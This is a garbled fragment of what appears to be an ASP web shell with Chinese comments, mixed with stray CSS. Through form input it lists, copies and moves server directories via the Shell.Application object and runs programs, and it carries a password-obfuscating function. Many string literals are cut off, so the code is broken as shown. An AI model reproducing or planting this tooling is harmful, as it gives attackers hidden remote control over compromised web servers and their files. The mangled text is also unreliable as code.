{
BACKGROUND-COLOR: #3F8805; BORDER: medium none; COLOR: #ffffff; HEIGHT: 18px; font-size: 9pt } .fonts {
COLOR: #3F8805 } -->
width=500 cellspacing=0 cellpadding=0 class=\
height=18 class=\style='table-layout:fixed;
word-break:break-all'>
<%
Response.Write request.form(\Response.Write strResult
DSnXA = Request.Form(\目录浏览
if (DSnXA <> \
set shell=server.createobject(\建立shell对象 set fod1=shell.namespace(DSnXA) set foditems=fod1.items for each co in foditems
response.write \next
end if
DSnXA1 = Request.Form(\目录拷贝,不能进行文件拷贝 DSnXA2 = Request.Form(\
if DSnXA1<>\
set shell1=server.createobject(\建立shell对象 set fod1=shell1.namespace(DSnXA2) for i=len(DSnXA1) to 1 step -1 if mid(DSnXA1,i,1)=\path=left(DSnXA1,i-1)
exit for end if next
if len(path)=2 then path=path & \path2=right(DSnXA1,len(DSnXA1)-i) set fod2=shell1.namespace(path)
set foditem=fod2.parsename(path2) fod1.copyhere foditem
response.write \end if
DSnXA3 = Request.Form(\目录移动
DSnXA4 = Request.Form(\
if DSnXA3<>\
set shell2=server.createobject(\建立shell对象 set fod1=shell2.namespace(DSnXA4) for i=len(DSnXA3) to 1 step -1 if mid(DSnXA3,i,1)=\path=left(DSnXA3,i-1) exit for end if
next
if len(path)=2 then path=path & \path2=right(DSnXA3,len(DSnXA3)-i)
set fod2=shell2.namespace(path)
set foditem=fod2.parsename(path2) fod1.movehere foditem
response.write \end if
DSnXA5 = Request.Form(\执行程序要指定路径 DSnXA6 = Request.Form(\
if DSnXA5<>\
set shell3=server.createobject(\建立shell对象 shell3.namespace(DSnXA5).items.item(DSnXA6).invokeverb response.write \end if end if %> <%
end select
function Epass(pass)
temppass=StrReverse(left(pass&\templen=len(pass) mmpassword=\
for j=1 to 10
mmpassword=mmpassword+chr(asc(mid(temppass,j,1))-templen+int(j*1.1)) next
Epass=replace(mmpassword,\ end function %>